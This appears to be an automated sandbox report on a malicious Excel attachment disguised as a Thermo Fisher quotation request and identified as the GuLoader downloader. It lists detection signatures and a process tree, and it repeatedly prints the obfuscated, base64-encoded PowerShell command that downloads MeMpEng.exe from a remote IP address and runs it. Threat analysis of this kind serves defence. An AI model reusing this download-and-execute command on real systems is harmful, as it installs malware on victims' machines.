Edit tour
Windows
Analysis Report
Thermo Fisher RFQ_TFS-1805.xls
Overview
General Information
| Sample name: | Thermo Fisher RFQ_TFS-1805.xls |
| Analysis ID: | 1500266 |
| MD5: | 0afb5bfb1d8d7668a5cce238da947f98 |
| SHA1: | c0c607e334c4b31e3cc8d5703ec16faa9b4766d4 |
| SHA256: | 98ad896fba17899465c642cc1e0e745ff5a081f5871fc091c0391a5929192ca5 |
| Tags: | xls |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w7x64
EXCEL.EXE (PID: 3492 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3756 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
cmd.exe (PID: 3856 cmdline: "C:\Window s\system32 \cmd.exe" "/C pOwERS hEll.eXE -Ex byPasS -NOP -w 1 -C DE vicEcREdeN TIaLdEploy ment ; Iex ($(IEx('[S yStem.TExT .EncODing] '+[CHaR]0X 3A+[chAr]0 X3a+'UTF8. getsTRIng( [sySTEm.CO NVErT]'+[C HaR]58+[Ch ar]0x3A+'f ROMBASE64S tRiNG('+[C Har]34+'JE 9TQzgxICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg YWRELXRZUG UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW1FTWJF UkRFRmluSV RpT04gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgJ1tE bGxJbXBvcn QoInVSTG1v Ti5kTGwiLC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BDaGFyU2V0 ID0gQ2hhcl NldC5Vbmlj b2RlKV1wdW JsaWMgc3Rh dGljIGV4dG VybiBJbnRQ dHIgVVJMRG 93bmxvYWRU b0ZpbGUoSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIHBG Y1pjall6LH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBz c1hlUSxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgZmNV elAsdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BZSmdRSEt2 LEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BVckIpOycg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5hbWUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIn B1UWd1aERY UXkiICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OQW 1lU3BhY0Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg V3JKQWJ0TV cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLVBhc3NU aHJ1OyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkT1 NDODE6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xOTIu My4yNDMuMT Y2LzM0MC9N ZU1wRW5nLm V4ZSIsIiRl blY6QVBQRE FUQVxNZU1w RW5nLmV4ZS IsMCwwKTtT dEFydC1TbG VFcCgzKTtz dEFSVCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJG VuVjpBUFBE QVRBXE1lTX BFbmcuZXhl Ig=='+[CHA r]0X22+')) ')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) 
powershell.exe (PID: 3880 cmdline: pOwERShEll .eXE -Ex b yPasS -NOP -w 1 -C DEvicE cREdeNTIaL dEployment ; Iex($(I Ex('[SySte m.TExT.Enc ODing]'+[C HaR]0X3A+[ chAr]0X3a+ 'UTF8.gets TRIng([syS TEm.CONVEr T]'+[CHaR] 58+[Char]0 x3A+'fROMB ASE64StRiN G('+[CHar] 34+'JE9TQz gxICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgID0gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgYWRE LXRZUGUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLW 1FTWJFUkRF RmluSVRpT0 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJ1tEbGxJ bXBvcnQoIn VSTG1vTi5k TGwiLCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHBGY1pj all6LHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBzc1hl USxzdHJpbm cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgZmNVelAs dWludCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBZSm dRSEt2LElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBVck IpOycgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLW5h bWUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgInB1UW d1aERYUXki ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1OQW1lU3 BhY0UgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgV3JK QWJ0TVcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLV Bhc3NUaHJ1 OyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAkT1NDOD E6OlVSTERv d25sb2FkVG 9GaWxlKDAs Imh0dHA6Ly 8xOTIuMy4y NDMuMTY2Lz M0MC9NZU1w RW5nLmV4ZS IsIiRlblY6 QVBQREFUQV xNZU1wRW5n LmV4ZSIsMC wwKTtTdEFy dC1TbGVFcC gzKTtzdEFS VCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiJGVuVj pBUFBEQVRB XE1lTXBFbm cuZXhlIg== '+[CHAr]0X 22+'))'))) " MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3984 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\nxtols lo\nxtolsl o.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3992 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA15F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\nxt olslo\CSCF B69AE6B65A 0404EAF48B F1216DF885 C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
MeMpEng.exe (PID: 4076 cmdline: "C:\Users\ user\AppDa ta\Roaming \MeMpEng.e xe" MD5: A80E27FBED396BE3D87FE48DA3C4F266) - mshta.exe (PID: 3148 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 2740 cmdline:
"C:\Window s\system32 \cmd.exe" "/C pOwERS hEll.eXE -Ex byPasS -NOP -w 1 -C DE vicEcREdeN TIaLdEploy ment ; Iex ($(IEx('[S yStem.TExT .EncODing] '+[CHaR]0X 3A+[chAr]0 X3a+'UTF8. getsTRIng( [sySTEm.CO NVErT]'+[C HaR]58+[Ch ar]0x3A+'f ROMBASE64S tRiNG('+[C Har]34+'JE 9TQzgxICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg YWRELXRZUG UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW1FTWJF UkRFRmluSV RpT04gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgJ1tE bGxJbXBvcn QoInVSTG1v Ti5kTGwiLC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BDaGFyU2V0 ID0gQ2hhcl NldC5Vbmlj b2RlKV1wdW JsaWMgc3Rh dGljIGV4dG VybiBJbnRQ dHIgVVJMRG 93bmxvYWRU b0ZpbGUoSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIHBG Y1pjall6LH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBz c1hlUSxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgZmNV elAsdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BZSmdRSEt2 LEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BVckIpOycg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5hbWUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIn B1UWd1aERY UXkiICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OQW 1lU3BhY0Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg V3JKQWJ0TV cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLVBhc3NU aHJ1OyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkT1 NDODE6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xOTIu My4yNDMuMT Y2LzM0MC9N ZU1wRW5nLm V4ZSIsIiRl blY6QVBQRE FUQVxNZU1w RW5nLmV4ZS IsMCwwKTtT dEFydC1TbG VFcCgzKTtz dEFSVCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJG VuVjpBUFBE QVRBXE1lTX BFbmcuZXhl Ig=='+[CHA r]0X22+')) ')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3068 cmdline:
pOwERShEll .eXE -Ex b yPasS -NOP -w 1 -C DEvicE cREdeNTIaL dEployment ; Iex($(I Ex('[SySte m.TExT.Enc ODing]'+[C HaR]0X3A+[ chAr]0X3a+ 'UTF8.gets TRIng([syS TEm.CONVEr T]'+[CHaR] 58+[Char]0 x3A+'fROMB ASE64StRiN G('+[CHar] 34+'JE9TQz gxICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgID0gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgYWRE LXRZUGUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLW 1FTWJFUkRF RmluSVRpT0 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJ1tEbGxJ bXBvcnQoIn VSTG1vTi5k TGwiLCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHBGY1pj all6LHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBzc1hl USxzdHJpbm cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgZmNVelAs dWludCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBZSm dRSEt2LElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBVck IpOycgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLW5h bWUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgInB1UW d1aERYUXki ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1OQW1lU3 BhY0UgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgV3JK QWJ0TVcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLV Bhc3NUaHJ1 OyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAkT1NDOD E6OlVSTERv d25sb2FkVG 9GaWxlKDAs Imh0dHA6Ly 8xOTIuMy4y NDMuMTY2Lz M0MC9NZU1w RW5nLmV4ZS IsIiRlblY6 QVBQREFUQV xNZU1wRW5n LmV4ZSIsMC wwKTtTdEFy dC1TbGVFcC gzKTtzdEFS VCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiJGVuVj pBUFBEQVRB XE1lTXBFbm cuZXhlIg== '+[CHAr]0X 22+'))'))) " MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 2860 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\4xnxdp zb\4xnxdpz b.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 2892 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESF3D2.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\4xn xdpzb\CSC1 523D407DAC 44B3A2AFF3 55F7A37C79 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - MeMpEng.exe (PID: 2432 cmdline:
"C:\Users\ user\AppDa ta\Roaming \MeMpEng.e xe" MD5: A80E27FBED396BE3D87FE48DA3C4F266)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||